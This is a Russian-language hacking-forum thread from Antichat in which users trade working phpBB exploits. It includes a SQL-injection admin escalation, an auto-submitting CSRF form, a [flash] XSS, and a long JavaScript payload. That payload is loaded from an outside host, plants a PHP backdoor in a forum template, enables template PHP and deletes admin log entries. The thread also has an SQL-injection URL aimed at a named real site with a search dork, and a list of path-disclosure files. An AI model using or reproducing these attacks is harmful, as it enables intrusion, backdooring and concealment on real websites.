Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.06.2009, 19:21
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Сообщение от DimOnOID
Отключённой в смысле? В Списке нету?..
Попробуй обраиться к срипту напрямую
Код:
admin_db_utilities.php?perform=restore&sid=сессия
Просто..встречал пару раз модифиц phpbb..Где в админке не было такого пункта.....но скрипт был) Нет, пункт есть, прделагается указать файл и залить - однако после нажатия на кнопку просто сюда же перебрасывает и снова предлагает залить файл. Т.е. не отваливается по таймауту, не показывает ошибку, не показывает успеха, а просто снова на эту же страницу рестора БД... без понятия, что сделтьт.
|
|
|
22.06.2009, 12:20
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Есть 2 вопроса:
1) с какой версии 2ой ветки в куках перестали храниться хэши?
2) имея куки админа, в админку версии 2.0.23 никак не зайти?
======================
Elekt пишет
1) с 2.0.19
2) в админке толи своя сессия(нужен хсс в админке), толи надо заставить админа залогиниться в админку, тогда сессия облагородится.
Последний раз редактировалось Elekt; 17.11.2009 в 03:56..
|
|
|
|
02.09.2009, 13:24
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
phpBB3 addon prime_quick_style GetAdmin Vulnerability
################################################## ########################
#
# phpBB3 addon prime_quick_style GetAdmin Exploit
#
# Vulnerability found and exploited by -SmoG-
#
# target file: prime_quick_style.php
#
#
# vuln: POST parameter "prime_quick_style" is injectable.
# source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625
#
# HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter.
# example: prime_quick_style = "5,user_type = 3, user_permissions = ''"
#
# query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId"
#
# gratz, now u will be an admin 
#
# --- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! ---
#
#
# -( by -SmoG- )-
################################################## ########################
# milw0rm.com [2009-09-01]
|
|
|
|
15.12.2009, 23:22
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Уязвимость: E-Mail send XSRF (CSRF) Vulnerability.
Описание: Собственно, работает лишь в phpbb2, в 3 версии уже закрыта.
Эксплойт:
Код:
<html>
<body>
<form action="http://victim.com/phpbb2/profile.php?mode=email&u=userid" method="post">
<input type="text" name="subject" value="XSRF bug" />
<textarea name="message">Found by Root-access</textarea>
<input type="checkbox" name="cc_email" value="0" checked="checked">
<input type="submit" id="xsrf" name="submit" value="O'k">
</form>
<script>document.getElementById("xsrf").click();</script>
</body>
</html>
Последний раз редактировалось Root-access; 15.12.2009 в 23:39..
|
|
|
|
Активный межсайтовый скриптинг и автозагрузка шелла в phpBB 3.0.x-3.0.6 |
22.12.2009, 22:57
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100
Репутация:
2033
|
|
Активный межсайтовый скриптинг и автозагрузка шелла в phpBB 3.0.x-3.0.6
1. Активный межсайтовый скриптинг phpBB 3.0.x-3.0.6.
BB-тег [flash] неотфильтрован чуть менее, чем полностью.
[flash=1,1]javascript:confirm(/lo/);//lo[/flash]
По умолчанию данный тег недоступен для зарегистрированных пользователей, но его можно разрешить для использования в личных сообщениях.
Работоспособность : Opera & Safari
Но есть ли там ещё XSS? O, да!
2. Автозагрузка шелла/ бэкдора и т.д. через XSS.
Для работы скрипта требуется, чтобы администратор был авторизован в админ. панеле.
Эксплойт реализует метод, описанный здесь: https://forum.antichat.ru/showpost.php?p=1176333&postcount=36:
* Скрипт не станет повторно добавлять php-код, если он уже имеется в шаблоне.
* В логе администратора удаляются записи только о произведенных действиях.
Шелл будет доступен по адресу: http://vulnsite.xz/forum/ucp.php?mode=login&lo=test
Также рекомендуется ознакомиться с этим https://forum.antichat.ru/showpost.php?p=1231741&postcount=37
Эксплойт:
Код:
/*/ phpBB 3.0.x-3.0.6 shell-inj.
/// Example:
javascript:with(document) getElementsByTagName('head').item(0).appendChild( createElement('script')).src='http://yoursite.xz/shell-inj.js';void(0);
/// LeverOne. 12.2009
/*/
phpcode = '<!-- PHP --> if($_GET[lo]) echo($_GET[lo]); <!-- ENDPHP -->';
template_file = 'login_body.html';
// выделение базового url (директория админки и сессия) из главной страницы
get_base_url(location.pathname.substring(0, location.pathname.lastIndexOf('/') + 1)+'#');
function get_base_url(url) {
requester('GET', url, null,
function() {
if (r.readyState == 4) {
base_url = r.responseText.match(/\.\/.+?\?sid=.{32}/);
if (base_url != null)
get_default_style(base_url);
}
}
);
}
// получение названия стиля по умолчанию
function get_default_style(base_url) {
requester('GET', base_url + '&i=styles&mode=style', null,
function() {
if (r.readyState == 4) {
default_style = r.responseText.match(/<strong>(.+?)<\/strong> \*/)[1];
get_templ_id(default_style, base_url);
}
}
);
}
// получение id шаблона по умолчанию
function get_templ_id(default_style, base_url) {
requester('GET', base_url + '&i=styles&mode=template', null,
function() {
if (r.readyState == 4) {
expr = new RegExp(default_style + '[\\w\\W]+?(id=\\d+)"', 'm');
templ_id = r.responseText.match(expr)[1];
to_edit_templ(templ_id, base_url);
}
}
);
}
// на пути к редактированию шаблона...
function to_edit_templ(templ_id, base_url) {
requester('GET', base_url + '&i=styles&mode=template&action=edit&' + templ_id, null,
function() {
if (r.readyState == 4) {
creation_time = r.responseText.match(/creation_time" value="(\d+)/i)[1];
form_token = r.responseText.match(/form_token" value="(.+?)"/i)[1];
postdata = 'template_file=' + template_file + '&creation_time=' + creation_time + '&form_token=' + form_token;
edit_templ(templ_id, base_url, postdata);
}
}
);
}
// редактирование шаблона
function edit_templ(templ_id, base_url, postdata) {
requester('POST', base_url + '&i=styles&mode=template&action=edit&' + templ_id + '&text_rows=20', postdata,
function() {
if (r.readyState == 4) {
template_data = r.responseText.match(/rows="20">([\w\W]+)<\/textarea/mi)[1];
template_data = template_data.replace(/</g, '<').replace(/>/g, '>').replace(/"/g, '"').replace(/&/g, '&');
if (template_data.indexOf(phpcode) == -1) {
template_data = encodeURIComponent(template_data + phpcode);
creation_time = r.responseText.match(/creation_time" value="(\d+)/i)[1];
form_token = r.responseText.match(/form_token" value="(.+?)"/i)[1];
postdata = 'template_data=' + template_data + '&template_file=' + template_file +'&creation_time=' + creation_time + '&form_token=' + form_token + '&save=1';
setTimeout("send_edit_templ(templ_id, base_url, '" + postdata + "')", 1000);
}
}
}
);
}
// отправка редактированного шаблона
function send_edit_templ(templ_id, base_url, postdata) {
requester('POST', base_url + '&i=styles&mode=template&action=edit&' + templ_id + '&text_rows=20', postdata,
function() {
if (r.readyState == 4) {
to_allow_php(base_url);
}
}
);
}
// переход на страницу настроек безопасности
function to_allow_php(base_url) {
requester('GET', base_url + '&i=board&mode=security', null,
function() {
if (r.readyState == 4) {
creation_time = r.responseText.match(/creation_time" value="(\d+)/i)[1];
form_token = r.responseText.match(/form_token" value="(.+?)"/i)[1];
postdata = 'config%5Btpl_allow_php%5D=1&submit=1&creation_time=' + creation_time + '&form_token=' + form_token;
setTimeout("allow_php(base_url, '" + postdata + "')", 1000);
}
}
);
}
// разрешение php в настройках
function allow_php(base_url, postdata) {
requester('POST', base_url + '&i=board&mode=security', postdata,
function() {
if (r.readyState == 4) {
to_delete_log(base_url);
}
}
);
}
// на пути к удалению логов...
function to_delete_log(base_url) {
requester('GET', base_url + '&i=logs&mode=admin', null,
function() {
if (r.readyState == 4) {
log_num = r.responseText.match(/mark\[\]" value="(\d+)/g);
postdata = 'mark%5B%5D='+ log_num[0].substring(15) + '&mark%5B%5D=' + log_num[1].substring(15) + '&mark%5B%5D=' + log_num[2].substring(15) + '&delmarked=1';
delete_log(base_url, postdata);
}
}
);
}
// удаление логов
function delete_log(base_url, postdata) {
requester('POST', base_url + '&i=logs&mode=admin', postdata,
function() {
if (r.readyState == 4) {
confirm_uid = r.responseText.match(/confirm_uid" value="(\d+)/i)[1];
sess = r.responseText.match(/sess" value="(.+?)"/i)[1];
sid = r.responseText.match(/sid" value="(.+?)"/i)[1];
confirm = r.responseText.match(/confirm" value="(.+?)"/i)[1];
postdata = postdata + '&confirm_uid=' + confirm_uid + '&sess=' + sess + '&sid=' + sid + '&confirm=' + encodeURIComponent(confirm);
confirm_key = r.responseText.match(/confirm_key=(.+?)"/i)[1];
confirm_delete_log(base_url, postdata, confirm_key);
}
}
);
}
// подтверждение удаления логов
function confirm_delete_log(base_url, postdata, confirm_key) {
requester('POST', base_url + '&i=logs&mode=admin&confirm_key='+ confirm_key, postdata, null
);
}
// универсальная функция запроса
function requester(method, url, postdata, func) {
try {r = new XMLHttpRequest()} catch(err) {r = new ActiveXObject('Msxml2.XMLHTTP')}
r.open(method, url + '&r=' + Math.ceil(1000*Math.random()));
if (method == 'POST') r.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
r.onreadystatechange = func;
r.send(postdata);
}
Как вы понимаете, он сработает с любой XSS.
Последний раз редактировалось LeverOne; 26.12.2009 в 20:18..
|
|
|
|
26.03.2010, 22:29
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Target: phpbb2*
Dork: inurl:"kb.php?mode=cat"
Example:
Код:
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=13
SQL injection (without union+select):
Код:
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+phpbb_kb_categories+group+by+2+limit+1)a)
Префикс таблицы kb_categories может отличаться, но его видно в ошибке
PS: актуально для 4.1<=MySQL=>5 |
|
|
|
10.04.2010, 23:52
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от .:[melkiy]:.
скажите где в phpbb3 раскрытия есть.. очень нужно
phpbb3 full path disclosure:
includes/db/mssql.php
includes/db/sqlite.php
includes/db/firebird.php
includes/db/mssql_odbc.php
includes/db/mysql.php
includes/db/mysql4.php
includes/db/mysqli.php
includes/db/postgres.php
includes/search/fulltext_phpbb.php
includes/search/fulltext_mysql.php
includes/acm/acm_main.php
includes/acp/auth.php
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
